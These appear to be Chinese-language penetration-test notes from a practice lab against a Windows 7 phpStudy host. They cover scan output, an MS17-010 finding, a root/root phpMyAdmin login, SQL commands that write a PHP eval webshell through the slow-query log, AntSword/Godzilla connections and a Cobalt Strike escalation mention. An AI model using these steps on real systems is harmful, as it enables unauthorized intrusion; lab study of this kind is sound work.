2023年10月27日
端口扫描
192.168.21.20:25 open
192.168.21.20:110 open
192.168.21.20:80 open
192.168.21.20:445 open
192.168.21.20:135 open
192.168.21.20:139 open
192.168.21.20:1026 open
192.168.21.20:1050 open
192.168.21.20:1031 open
192.168.21.20:1027 open
192.168.21.20:1025 open
192.168.21.20:1028 open
192.168.21.20:3306 open
[*] alive ports len is: 13
start vulscan
[*] 192.168.21.20 __MSBROWSE__\STU1 Windows 7 Professional 7601 Service Pack 1
[+] 192.168.21.20 MS17-010 (Windows 7 Professional 7601 Service Pack 1)
[*] WebTitle:http://192.168.21.20 code:200 len:14747 title:phpStudy 探针 2014
目录扫描
[20:55:33] 200 - 172KB - /1.php
[20:55:35] 403 - 225B - /Trace.axd::$DATA
[20:55:51] 403 - 225B - /index.php::$DATA
[20:55:53] 200 - 14KB - /l.php
[20:55:57] 200 - 2KB - /phpmyadmin/README
[20:55:57] 200 - 32KB - /phpmyadmin/ChangeLog
[20:55:57] 200 - 71KB -
[20:55:57] 301 - 240B - /phpMyAdmin -> http://192.168.21.20/phpMyAdmin/
[20:55:57] 301 - 240B - /phpmyadmin -> http://192.168.21.20/phpmyadmin/
[20:55:58] 200 - 4KB - /phpMyAdmin/
[20:55:58] 200 - 4KB - /phpMyadmin/
[20:55:58] 200 - 4KB - /phpMyAdmin/index.php
[20:55:58] 200 - 4KB - /phpmyAdmin/
[20:55:58] 200 - 4KB - /phpmyadmin/index.php
[20:55:58] 200 - 4KB - /phpmyadmin/
[20:56:02] 200 - 79KB - /shell.php
访问网址出现这个尝试一下发现弱口令root、root
利用这里的弱口令直接登录phpmyadmin
http://192.168.21.20/phpinfo.php敏感信息泄露
192.168.21.20/phpmyadmin/README
判断数据库慢查询日志开启没有
show variables like '%general%';
set global slow_query_log_file='C:/phpStudy/WWW/shell.php';
select '<?php @eval($_POST[shell]);?>' or sleep(10);
show global variables like '%long_query_time%';
讲一句话写入
使用蚁剑连接
这里蚁剑没有办法执行我们换成哥斯拉
好啦成功运行了
然后cs就根据系统版本这些东西选择提权的东西了
域信息